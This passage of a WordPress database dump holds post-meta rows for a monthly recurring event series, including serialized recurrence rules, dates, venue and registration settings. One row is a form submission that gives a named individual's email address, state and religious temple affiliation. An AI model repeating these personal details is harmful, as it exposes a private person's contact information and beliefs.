:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:5:\"First\";s:3:\"day\";s:1:\"7\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2022-02-06\";s:14:\"EventStartDate\";s:19:\"2021-03-07 10:30:00\";s:12:\"EventEndDate\";s:19:\"2021-03-07 12:00:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(128664,263375,'_EventShowMapLink','1'),(128665,263375,'_EventShowMap','1'),(128666,263375,'_EventVenueID','262305'),(128667,263375,'_EventCurrencySymbol',''),(128668,263375,'_EventCurrencyPosition','prefix'),(128669,263375,'_EventCost',''),(128670,263375,'_EventURL',''),(128671,263375,'_EventTimezone','America/Denver'),(128672,263375,'_dp_original','263362'),(128673,263375,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:0:{}s:6:\"update\";a:11:{i:263369;a:2:{s:9:\"timestamp\";i:1617532200;s:8:\"duration\";i:5400;}i:263370;a:2:{s:9:\"timestamp\";i:1619951400;s:8:\"duration\";i:5400;}i:263371;a:2:{s:9:\"timestamp\";i:1622975400;s:8:\"duration\";i:5400;}i:263372;a:2:{s:9:\"timestamp\";i:1625394600;s:8:\"duration\";i:5400;}i:263373;a:2:{s:9:\"timestamp\";i:1627813800;s:8:\"duration\";i:5400;}i:263374;a:2:{s:9:\"timestamp\";i:1630837800;s:8:\"duration\";i:5400;}i:263375;a:2:{s:9:\"timestamp\";i:1633257000;s:8:\"duration\";i:5400;}i:263376;a:2:{s:9:\"timestamp\";i:1636281000;s:8:\"duration\";i:5400;}i:263377;a:2:{s:9:\"timestamp\";i:1638700200;s:8:\"duration\";i:5400;}i:263378;a:2:{s:9:\"timestamp\";i:1641119400;s:8:\"duration\";i:5400;}i:263379;a:2:{s:9:\"timestamp\";i:1644143400;s:8:\"duration\";i:5400;}}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:11;}'),(126410,263376,'_EventStartDate','2021-11-07 10:30:00'),(126411,263376,'_EventStartDateUTC','2021-11-07 17:30:00'),(126412,263376,'_EventEndDate','2021-11-07 12:00:00'),(126413,263376,'_EventEndDateUTC','2021-11-07 19:00:00'),(126414,263376,'_EventDuration','5400'),(128687,263376,'boldgrid_hide_page_title','0'),(128674,263376,'_tribe_modified_fields','a:21:{s:16:\"protect_children\";i:1610635271;s:12:\"_EventOrigin\";i:1610635271;s:13:\"_thumbnail_id\";i:1610635271;s:26:\"_RTECregistrationsDisabled\";i:1610635271;s:17:\"_RTECdeadlineType\";i:1610635271;s:19:\"_RTECwhoCanRegister\";i:1610635271;s:23:\"_RTEClimitRegistrations\";i:1610635271;s:21:\"_RTECmaxRegistrations\";i:1610635271;s:24:\"boldgrid_hide_page_title\";i:1610635271;s:16:\"_EventRecurrence\";i:1610635271;s:17:\"_EventShowMapLink\";i:1610635271;s:13:\"_EventShowMap\";i:1610635271;s:13:\"_EventVenueID\";i:1610635271;s:20:\"_EventCurrencySymbol\";i:1610635271;s:22:\"_EventCurrencyPosition\";i:1610635271;s:10:\"_EventCost\";i:1610635271;s:9:\"_EventURL\";i:1610635271;s:14:\"_EventTimezone\";i:1610635271;s:12:\"_dp_original\";i:1610635271;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610635271;s:16:\"tribe_events_cat\";i:1610660471;}'),(128682,263376,'_RTECregistrationsDisabled','1'),(128683,263376,'_RTECdeadlineType','start'),(128684,263376,'_RTECwhoCanRegister','any'),(128803,263449,'_field_224','Mike'),(128804,263449,'_field_225','Protzik'),(128805,263449,'_field_226','mikeprotzik@yahoo.com'),(128806,263449,'_field_227','CO'),(128807,263449,'_field_228','US'),(128808,263449,'_field_229','a:1:{i:0;s:39:\"Central Colorado/ECK Temple in Colorado\";}'),(128809,263449,'_form_id','21'),(128810,263449,'_seq_num','117'),(128678,263376,'_tribe_modified_fields','a:21:{s:16:\"protect_children\";i:1610635271;s:12:\"_EventOrigin\";i:1610635271;s:13:\"_thumbnail_id\";i:1610635271;s:26:\"_RTECregistrationsDisabled\";i:1610635271;s:17:\"_RTECdeadlineType\";i:1610635271;s:19:\"_RTECwhoCanRegister\";i:1610635271;s:23:\"_RTEClimitRegistrations\";i:1610635271;s:21:\"_RTECmaxRegistrations\";i:1610635271;s:24:\"boldgrid_hide_page_title\";i:1610635271;s:16:\"_EventRecurrence\";i:1610635271;s:17:\"_EventShowMapLink\";i:1610635271;s:13:\"_EventShowMap\";i:1610635271;s:13:\"_EventVenueID\";i:1610635271;s:20:\"_EventCurrencySymbol\";i:1610635271;s:22:\"_EventCurrencyPosition\";i:1610635271;s:10:\"_EventCost\";i:1610635271;s:9:\"_EventURL\";i:1610635271;s:14:\"_EventTimezone\";i:1610635271;s:12:\"_dp_original\";i:1610635271;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610635271;s:16:\"tribe_events_cat\";i:1610660471;}'),(128680,263376,'_EventOrigin','events-calendar'),(128685,263376,'_RTEClimitRegistrations','0'),(128686,263376,'_RTECmaxRegistrations','30'),(128679,263376,'_EventOrigin','events-calendar'),(128689,263376,'_EventShowMapLink','1'),(128690,263376,'_EventShowMap','1'),(128691,263376,'_EventVenueID','262305'),(128692,263376,'_EventCurrencySymbol',''),(128693,263376,'_EventCurrencyPosition','prefix'),(128694,263376,'_EventCost',''),(128695,263376,'_EventURL',''),(128696,263376,'_EventTimezone','America/Denver'),(128697,263376,'_dp_original','263362'),(128698,263376,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:0:{}s:6:\"update\";a:11:{i:263369;a:2:{s:9:\"timestamp\";i:1617532200;s:8:\"duration\";i:5400;}i:263370;a:2:{s:9:\"timestamp\";i:1619951400;s:8:\"duration\";i:5400;}i:263371;a:2:{s:9:\"timestamp\";i:1622975400;s:8:\"duration\";i:5400;}i:263372;a:2:{s:9:\"timestamp\";i:1625394600;s:8:\"duration\";i:5400;}i:263373;a:2:{s:9:\"timestamp\";i:1627813800;s:8:\"duration\";i:5400;}i:263374;a:2:{s:9:\"timestamp\";i:1630837800;s:8:\"duration\";i:5400;}i:263375;a:2:{s:9:\"timestamp\";i:1633257000;s:8:\"duration\";i:5400;}i:263376;a:2:{s:9:\"timestamp\";i:1636281000;s:8:\"duration\";i:5400;}i:263377;a:2:{s:9:\"timestamp\";i:1638700200;s:8:\"duration\";i:5400;}i:263378;a:2:{s:9:\"timestamp\";i:1641119400;s:8:\"duration\";i:5400;}i:263379;a:2:{s:9:\"timestamp\";i:1644143400;s:8:\"duration\";i:5400;}}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:11;}'),(128688,263376,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:5:\"First\";s:3:\"day\";s:1:\"7\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2022-02-06\";s:14:\"EventStartDate\";s:19:\"2021-03-07 10:30:00\";s:12:\"EventEndDate\";s:19:\"2021-03-07 12:00:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(126443,263377,'_EventStartDate','2021-12-05 10:30:00'),(126444,263377,'_EventStartDateUTC','2021-12-05 17:30:00'),(126445,263377,'_EventEndDate','2021-12-05 12:00:00'),(126446,263377,'_EventEndDateUTC','2021-12-05 19:00:00'),(126447,263377,'_EventDuration','5400'),(128699,263377,'_tribe_modified_fields','a:21:{s:16:\"protect_children\";i:1610635272;s:12:\"_EventOrigin\";i:1610635272;s:13:\"_thumbnail_id\";i:1610635272;s:26:\"_RTECregistrationsDisabled\";i:1610635272;s:17:\"_RTECdeadlineType\";i:1610635272;s:19:\"_RTECwhoCanRegister\";i:1610635272;s:23:\"_RTEClimitRegistrations\";i:1610635272;s:21:\"_RTECmaxRegistrations\";i:1610635272;s:24:\"boldgrid_hide_page_title\";i:1610635272;s:16:\"_EventRecurrence\";i:1610635272;s:17:\"_EventShowMapLink\";i:1610635272;s:13:\"_EventShowMap\";i:1610635272;s:13:\"_EventVenueID\";i:1610635272;s:20:\"_EventCurrencySymbol\";i:1610635272;s:22:\"_EventCurrencyPosition\";i:1610635272;s:10:\"_EventCost\";i:1610635272;s:9:\"_EventURL\";i:1610635272;s:14:\"_EventTimezone\";i:1610635272;s:12:\"_dp_original\";i:1610635272;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610635272;s:16:\"tribe_events_cat\";i:1610660472;}'),(128705,263377,'_EventOrigin','events-calendar'),(128707,263377,'_RTECregistrationsDisabled','1'),(128708,263377,'_RTECdeadlineType','start'),(128709,263377,'_RTECwhoCanRegister','any'),(128703,263377,'_tribe_modified_fields','a:21:{s:16:\"protect_children\";i:1610635272;s:12:\"_EventOrigin\";i:1610635272;s:13:\"_thumbnail_id\";i:1610635272;s:26:\"_RTECregistrationsDisabled\";i:1610635272;s:17:\"_RTECdeadlineType\";i:1610635272;s:19:\"_RTECwhoCanRegister\";i:1610635272;s:23:\"_RTEClimitRegistrations\";i:1610635272;s:21:\"_RTECmaxRegistrations\";i:1610635272;s:24:\"boldgrid_hide_page_title\";i:1610635272;s:16:\"_EventRecurrence\";i:1610635272;s:17:\"_EventShowMapLink\";i:1610635272;s:13:\"_EventShowMap\";i:1610635272;s:13:\"_EventVenueID\";i:1610635272;s:20:\"_EventCurrencySymbol\";i:1610635272;s:22:\"_EventCurrencyPosition\";i:1610635272;s:10:\"_EventCost\";i:1610635272;s:9:\"_EventURL\";i:1610635272;s:14:\"_EventTimezone\";i:1610635272;s:12:\"_dp_original\";i:1610635272;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610635272;s:16:\"tribe_events_cat\";i:1610660472;}'),(128704,263377,'_EventOrigin','events-calendar'),(128710,263377,'_RTEClimitRegistrations','0'),(128711,263377,'_RTECmaxRegistrations','30'),(128712,263377,'boldgrid_hide_page_title','0'),(128713,263377,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:5:\"First\";s:3:\"day\";s:1:\"7\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2022-02-06\";s:14:\"EventStartDate\";s:19:\"2021-03-07 10:30:00\";s:12:\"EventEndDate\";s:19:\"2021-03-07 12:00:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(128714,263377,'_EventShowMapLink','1'),(128715,263377,'_EventShowMap','1'),(128716,263377,'_EventVenueID','262305'),(128717,263377,'_EventCurrencySymbol',''),(128718,263377,'_EventCurrencyPosition','prefix'),(128719,263377,'_EventCost',''),(128720,263377,'_EventURL',''),(128721,263377,'_EventTimezone','America/Denver'),(128722,263377,'_dp_original','263362'),(128723,263377,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:0:{}s:6:\"update\";a:11:{i:263369;a:2:{s:9:\"timestamp\";i:1617532200;s:8:\"duration\";i:5400;}i:263370;a:2:{s:9:\"timestamp\";i:1619951400;s:8:\"duration\";i:5400;}i:263371;a:2:{s:9:\"timestamp\";i:1622975400;s:8:\"duration\";i:5400;}i:263372;a:2:{s:9:\"timestamp\";i:1625394600;s:8:\"duration\";i:5400;}i:263373;a:2:{s:9:\"timestamp\";i:1627813800;s:8:\"duration\";i:5400;}i:263374;a:2:{s:9:\"timestamp\";i:1630837800;s:8:\"duration\";i:5400;}i:263375;a:2:{s:9:\"timestamp\";i:1633257000;s:8:\"duration\";i:5400;}i:263376;a:2:{s:9:\"timestamp\";i:1636281000;s:8:\"duration\";i:5400;}i:263377;a:2:{s:9:\"timestamp\";i:1638700200;s:8:\"duration\";i:5400;}i:263378;a:2:{s:9:\"timestamp\";i:1641119400;s:8:\"duration\";i:5400;}i:263379;a:2:{s:9:\"timestamp\";i:1644143400;s:8:\"duration\";i:5400;}}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:11;}'),(126476,263378,'_EventStartDate','2022-01-02 10:30:00'),(126477,263378,'_EventStartDateUTC','2022-01-02 17:30:00'),(126478,263378,'_EventEndDate','2022-01-02 12:00:00'),(126479,263378,'_EventEndDateUTC','2022-01-02 19:00:00'),(126480,263378,'_EventDuration','5400'),(128739,263378,'_EventShowMapLink','1'),(128730,263378,'_EventOrigin','events-calendar'),(128729,263378,'_EventOrigin','events-calendar'),(127405,263404,'boldgrid_hide_page_title','0'),(127396,263404,'protect_children',''),(127397,263404,'_tribe_modified_fields','a:31:{s:16:\"protect_children\";i:1610634380;s:12:\"_EventOrigin\";i:1610634380;s:13:\"_thumbnail_id\";i:1610634380;s:26:\"_RTECregistrationsDisabled\";i:1610634380;s:17:\"_RTECdeadlineType\";i:1610634380;s:19:\"_RTECwhoCanRegister\";i:1610634380;s:23:\"_RTEClimitRegistrations\";i:1610634380;s:21:\"_RTECmaxRegistrations\";i:1610634380;s:24:\"boldgrid_hide_page_title\";i:1610634380;s:16:\"_EventRecurrence\";i:1610635075;s:17:\"_EventShowMapLink\";i:1610634380;s:13:\"_EventShowMap\";i:1610634380;s:13:\"_EventVenueID\";i:1610634380;s:15:\"_EventStartDate\";i:1610634661;s:13:\"_EventEndDate\";i:1610635075;s:18:\"_EventStartDateUTC\";i:1610634661;s:16:\"_EventEndDateUTC\";i:1610635075;s:14:\"_EventDuration\";i:1610635075;s:20:\"_EventCurrencySymbol\";i:1610634380;s:22:\"_EventCurrencyPosition\";i:1610634380;s:10:\"_EventCost\";i:1610634380;s:9:\"_EventURL\";i:1610634380;s:14:\"_EventTimezone\";i:1610634380;s:18:\"_EventTimezoneAbbr\";i:1610634380;s:12:\"_dp_original\";i:1610634381;s:10:\"_edit_last\";i:1610634453;s:10:\"post_title\";i:1610634453;s:12:\"post_content\";i:1610634661;s:16:\"tribe_events_cat\";i:1610660407;s:11:\"post_status\";i:1610634661;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610635835;}'),(127400,263404,'_RTECregistrationsDisabled','1'),(128740,263378,'_EventShowMap','1'),(128741,263378,'_EventVenueID','262305'),(128742,263378,'_EventCurrencySymbol',''),(128743,263378,'_EventCurrencyPosition','prefix'),(128744,263378,'_EventCost',''),(128745,263378,'_EventURL',''),(128746,263378,'_EventTimezone','America/Denver'),(128747,263378,'_dp_original','263362'),(128727,263378,'_tribe_modified_fields','a:21:{s:16:\"protect_children\";i:1610635272;s:12:\"_EventOrigin\";i:1610635272;s:13:\"_thumbnail_id\";i:1610635272;s:26:\"_RTECregistrationsDisabled\";i:1610635272;s:17:\"_RTECdeadlineType\";i:1610635272;s:19:\"_RTECwhoCanRegister\";i:1610635272;s:23:\"_RTEClimitRegistrations\";i:1610635272;s:21:\"_RTECmaxRegistrations\";i:1610635272;s:24:\"boldgrid_hide_page_title\";i:1610635272;s:16:\"_EventRecurrence\";i:1610635272;s:17:\"_EventShowMapLink\";i:1610635272;s:13:\"_EventShowMap\";i:1610635272;s:13:\"_EventVenueID\";i:1610635272;s:20:\"_EventCurrencySymbol\";i:1610635272;s:22:\"_EventCurrencyPosition\";i:1610635272;s:10:\"_EventCost\";i:1610635272;s:9:\"_EventURL\";i:1610635272;s:14:\"_EventTimezone\";i:1610635272;s:12:\"_dp_original\";i:1610635272;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610635272;s:16:\"tribe_events_cat\";i:1610660472;}'),(128738,263378,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:5:\"First\";s:3:\"day\";s:1:\"7\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2022-02-06\";s:14:\"EventStartDate\";s:19:\"2021-03-07 10:30:00\";s:12:\"EventEndDate\";s:19:\"2021-03-07 12:00:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(127861,263417,'_EventStartDate','2020-12-27 10:00:00'),(127862,263417,'_EventStartDateUTC','2020-12-27 17:00:00'),(127863,263417,'_EventEndDate','2020-12-27 12:00:00'),(127864,263417,'_EventEndDateUTC','2020-12-27 19:00:00'),(127865,263417,'_EventDuration','7200'),(128748,263378,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:0:{}s:6:\"update\";a:11:{i:263369;a:2:{s:9:\"timestamp\";i:1617532200;s:8:\"duration\";i:5400;}i:263370;a:2:{s:9:\"timestamp\";i:1619951400;s:8:\"duration\";i:5400;}i:263371;a:2:{s:9:\"timestamp\";i:1622975400;s:8:\"duration\";i:5400;}i:263372;a:2:{s:9:\"timestamp\";i:1625394600;s:8:\"duration\";i:5400;}i:263373;a:2:{s:9:\"timestamp\";i:1627813800;s:8:\"duration\";i:5400;}i:263374;a:2:{s:9:\"timestamp\";i:1630837800;s:8:\"duration\";i:5400;}i:263375;a:2:{s:9:\"timestamp\";i:1633257000;s:8:\"duration\";i:5400;}i:263376;a:2:{s:9:\"timestamp\";i:1636281000;s:8:\"duration\";i:5400;}i:263377;a:2:{s:9:\"timestamp\";i:1638700200;s:8:\"duration\";i:5400;}i:263378;a:2:{s:9:\"timestamp\";i:1641119400;s:8:\"duration\";i:5400;}i:263379;a:2:{s:9:\"timestamp\";i:1644143400;s:8:\"duration\";i:5400;}}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:11;}'),(128724,263378,'_tribe_modified_fields','a:21:{s:16:\"protect_children\";i:1610635272;s:12:\"_EventOrigin\";i:1610635272;s:13:\"_thumbnail_id\";i:1610635272;s:26:\"_RTECregistrationsDisabled\";i:1610635272;s:17:\"_RTECdeadlineType\";i:1610635272;s:19:\"_RTECwhoCanRegister\";i:1610635272;s:23:\"_RTEClimitRegistrations\";i:1610635272;s:21:\"_RTECmaxRegistrations\";i:1610635272;s:24:\"boldgrid_hide_page_title\";i:1610635272;s:16:\"_EventRecurrence\";i:1610635272;s:17:\"_EventShowMapLink\";i:1610635272;s:13:\"_EventShowMap\";i:1610635272;s:13:\"_EventVenueID\";i:1610635272;s:20:\"_EventCurrencySymbol\";i:1610635272;s:22:\"_EventCurrencyPosition\";i:1610635272;s:10:\"_EventCost\";i:1610635272;s:9:\"_EventURL\";i:1610635272;s:14:\"_EventTimezone\";i:1610635272;s:12:\"_dp_original\";i:1610635272;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610635272;s:16:\"tribe_events_cat\";i:1610660472;}'),(128736,263378,'_RTECmaxRegistrations','30'),(128737,263378,'boldgrid_hide_page_title','0'),(128728,263378,'_tribe_modified_fields','a:21:{s:16:\"protect_children\";i:1610635272;s:12:\"_EventOrigin\";i:1610635272;s:13:\"_thumbnail_id\";i:1610635272;s:26:\"_RTECregistrationsDisabled\";i:1610635272;s:17:\"_RTECdeadlineType\";i:1610635272;s:19:\"_RTECwhoCanRegister\";i:1610635272;s:23:\"_RTEClimitRegistrations\";i:1610635272;s:21:\"_RTECmaxRegistrations\";i:1610635272;s:24:\"boldgrid_hide_page_title\";i:1610635272;s:16:\"_EventRecurrence\";i:1610635272;s:17:\"_EventShowMapLink\";i:1610635272;s:13:\"_EventShowMap\";i:1610635272;s:13:\"_EventVenueID\";i:1610635272;s:20:\"_EventCurrencySymbol\";i:1610635272;s:22:\"_EventCurrencyPosition\";i:1610635272;s:10:\"_EventCost\";i:1610635272;s:9:\"_EventURL\";i:1610635272;s:14:\"_EventTimezone\";i:1610635272;s:12:\"_dp_original\";i:1610635272;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610635272;s:16:\"tribe_events_cat\";i:1610660472;}'),(128732,263378,'_RTECregistrationsDisabled','1'),(128733,263378,'_RTECdeadlineType','start'),(128734,263378,'_RTECwhoCanRegister','any'),(128735,263378,'_RTEClimitRegistrations','0'),(126512,263379,'_EventEndDateUTC','2022-02-06 19:00:00'),(126513,263379,'_EventDuration','5400'),(127404,263404,'_RTECmaxRegistrations','30'),(128749,263379,'_tribe_modified_fields','a:21:{s:16:\"protect_children\";i:1610635306;s:12:\"_EventOrigin\";i:1610635306;s:13:\"_thumbnail_id\";i:1610635306;s:26:\"_RTECregistrationsDisabled\";i:1610635306;s:17:\"_RTECdeadlineType\";i:1610635306;s:19:\"_RTECwhoCanRegister\";i:1610635306;s:23:\"_RTEClimitRegistrations\";i:1610635306;s:21:\"_RTECmaxRegistrations\";i:1610635306;s:24:\"boldgrid_hide_page_title\";i:1610635306;s:16:\"_EventRecurrence\";i:1610635306;s:17:\"_EventShowMapLink\";i:1610635306;s:13:\"_EventShowMap\";i:1610635306;s:13:\"_EventVenueID\";i:1610635306;s:20:\"_EventCurrencySymbol\";i:1610635306;s:22:\"_EventCurrencyPosition\";i:1610635306;s:10:\"_EventCost\";i:1610635306;s:9:\"_EventURL\";i:1610635306;s:14:\"_EventTimezone\";i:1610635306;s:12:\"_dp_original\";i:1610635306;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610635306;s:16:\"tribe_events_cat\";i:1610660506;}'),(128764,263379,'_EventShowMapLink','1'),(128765,263379,'_EventShowMap','1'),(128766,263379,'_EventVenueID','262305'),(128767,263379,'_EventCurrencySymbol',''),(128768,263379,'_EventCurrencyPosition','prefix'),(128750,263379,'protect_children',''),(128751,263379,'protect_children',''),(128752,263379,'_tribe_modified_fields','a:21:{s:16:\"protect_children\";i:1610635306;s:12:\"_EventOrigin\";i:1610635306;s:13:\"_thumbnail_id\";i:1610635306;s:26:\"_RTECregistrationsDisabled\";i:1610635306;s:17:\"_RTECdeadlineType\";i:1610635306;s:19:\"_RTECwhoCanRegister\";i:1610635306;s:23:\"_RTEClimitRegistrations\";i:1610635306;s:21:\"_RTECmaxRegistrations\";i:1610635306;s:24:\"boldgrid_hide_page_title\";i:1610635306;s:16:\"_EventRecurrence\";i:1610635306;s:17:\"_EventShowMapLink\";i:1610635306;s:13:\"_EventShowMap\";i:1610635306;s:13:\"_EventVenueID\";i:1610635306;s:20:\"_EventCurrencySymbol\";i:1610635306;s:22:\"_EventCurrencyPosition\";i:1610635306;s:10:\"_EventCost\";i:1610635306;s:9:\"_EventURL\";i:1610635306;s:14:\"_EventTimezone\";i:1610635306;s:12:\"_dp_original\";i:1610635306;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610635306;s:16:\"tribe_events_cat\";i:1610660506;}'),(128761,263379,'_RTECmaxRegistrations','30'),(128762,263379,'boldgrid_hide_page_title','0'),(128763,263379,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:5:\"First\";s:3:\"day\";s:1:\"7\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2022-02-06\";s:14:\"EventStartDate\";s:19:\"2021-03-07 10:30:00\";s:12:\"EventEndDate\";s:19:\"2021-03-07 12:00:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(128753,263379,'_tribe_modified_fields','a:21:{s:16:\"protect_children\";i:1610635306;s:12:\"_EventOrigin\";i:1610635306;s:13:\"_thumbnail_id\";i:1610635306;s:26:\"_RTECregistrationsDisabled\";i:1610635306;s:17:\"_RTECdeadlineType\";i:1610635306;s:19:\"_RTECwhoCanRegister\";i:1610635306;s:23:\"_RTEClimitRegistrations\";i:1610635306;s:21:\"_RTECmaxRegistrations\";i:1610635306;s:24:\"boldgrid_hide_page_title\";i:1610635306;s:16:\"_EventRecurrence\";i:1610635306;s:17:\"_EventShowMapLink\";i:1610635306;s:13:\"_EventShowMap\";i:1610635306;s:13:\"_EventVenueID\";i:1610635306;s:20:\"_EventCurrencySymbol\";i:1610635306;s:22:\"_EventCurrencyPosition\";i:1610635306;s:10:\"_EventCost\";i:1610635306;s:9:\"_EventURL\";i:1610635306;s:14:\"_EventTimezone\";i:1610635306;s:12:\"_dp_original\";i:1610635306;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610635306;s:16:\"tribe_events_cat\";i:1610660506;}'),(128755,263379,'_EventOrigin','events-calendar'),(128757,263379,'_RTECregistrationsDisabled','1'),(128758,263379,'_RTECdeadlineType','start'),(128759,263379,'_RTECwhoCanRegister','any'),(128760,263379,'_RTEClimitRegistrations','0'),(128754,263379,'_EventOrigin','events-calendar'),(127393,263404,'protect_children',''),(127394,263404,'_tribe_modified_fields','a:31:{s:16:\"protect_children\";i:1610634380;s:12:\"_EventOrigin\";i:1610634380;s:13:\"_thumbnail_id\";i:1610634380;s:26:\"_RTECregistrationsDisabled\";i:1610634380;s:17:\"_RTECdeadlineType\";i:1610634380;s:19:\"_RTECwhoCanRegister\";i:1610634380;s:23:\"_RTEClimitRegistrations\";i:1610634380;s:21:\"_RTECmaxRegistrations\";i:1610634380;s:24:\"boldgrid_hide_page_title\";i:1610634380;s:16:\"_EventRecurrence\";i:1610635075;s:17:\"_EventShowMapLink\";i:1610634380;s:13:\"_EventShowMap\";i:1610634380;s:13:\"_EventVenueID\";i:1610634380;s:15:\"_EventStartDate\";i:1610634661;s:13:\"_EventEndDate\";i:1610635075;s:18:\"_EventStartDateUTC\";i:1610634661;s:16:\"_EventEndDateUTC\";i:1610635075;s:14:\"_EventDuration\";i:1610635075;s:20:\"_EventCurrencySymbol\";i:1610634380;s:22:\"_EventCurrencyPosition\";i:1610634380;s:10:\"_EventCost\";i:1610634380;s:9:\"_EventURL\";i:1610634380;s:14:\"_EventTimezone\";i:1610634380;s:18:\"_EventTimezoneAbbr\";i:1610634380;s:12:\"_dp_original\";i:1610634381;s:10:\"_edit_last\";i:1610634453;s:10:\"post_title\";i:1610634453;s:12:\"post_content\";i:1610634661;s:16:\"tribe_events_cat\";i:1610660407;s:11:\"post_status\";i:1610634661;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610635835;}'),(128769,263379,'_EventCost',''),(128770,263379,'_EventURL',''),(128771,263379,'_EventTimezone','America/Denver'),(128772,263379,'_dp_original','263362'),(128773,263379,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:0:{}s:6:\"update\";a:1:{i:263379;a:2:{s:9:\"timestamp\";i:1644143400;s:8:\"duration\";i:5400;}}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:11;}'),(128902,263459,'_EventURL',''),(128866,263459,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1611754998;s:12:\"_EventOrigin\";i:1611754998;s:13:\"_thumbnail_id\";i:1611755387;s:24:\"boldgrid_hide_page_title\";i:1611754998;s:17:\"_EventShowMapLink\";i:1611754998;s:13:\"_EventShowMap\";i:1611754998;s:15:\"_EventStartDate\";i:1611755387;s:13:\"_EventEndDate\";i:1611755387;s:18:\"_EventStartDateUTC\";i:1611755387;s:16:\"_EventEndDateUTC\";i:1611755387;s:14:\"_EventDuration\";i:1611755387;s:20:\"_EventCurrencySymbol\";i:1611754998;s:22:\"_EventCurrencyPosition\";i:1611754998;s:10:\"_EventCost\";i:1611754998;s:9:\"_EventURL\";i:1611754998;s:14:\"_EventTimezone\";i:1611754998;s:18:\"_EventTimezoneAbbr\";i:1611754998;s:27:\"_EventNextPendingRecurrence\";i:1611754998;s:26:\"_RTECregistrationsDisabled\";i:1611754998;s:17:\"_RTECdeadlineType\";i:1611754998;s:19:\"_RTECwhoCanRegister\";i:1611754998;s:23:\"_RTEClimitRegistrations\";i:1611754998;s:21:\"_RTECmaxRegistrations\";i:1611754998;s:16:\"_EventRecurrence\";i:1611754998;s:18:\"_RTECnumRegistered\";i:1611754999;s:13:\"_EventVenueID\";i:1611754999;s:12:\"_dp_original\";i:1611754999;s:16:\"tribe_events_cat\";i:1611781382;s:10:\"_edit_last\";i:1611755021;s:12:\"post_content\";i:1611756114;s:10:\"post_title\";i:1611755097;s:11:\"post_status\";i:1611755387;}'),(128865,263459,'protect_children',''),(128864,263459,'protect_children',''),(127395,263404,'_EventOrigin','events-calendar'),(128523,263369,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:0:{}s:6:\"update\";a:11:{i:263369;a:2:{s:9:\"timestamp\";i:1617532200;s:8:\"duration\";i:5400;}i:263370;a:2:{s:9:\"timestamp\";i:1619951400;s:8:\"duration\";i:5400;}i:263371;a:2:{s:9:\"timestamp\";i:1622975400;s:8:\"duration\";i:5400;}i:263372;a:2:{s:9:\"timestamp\";i:1625394600;s:8:\"duration\";i:5400;}i:263373;a:2:{s:9:\"timestamp\";i:1627813800;s:8:\"duration\";i:5400;}i:263374;a:2:{s:9:\"timestamp\";i:1630837800;s:8:\"duration\";i:5400;}i:263375;a:2:{s:9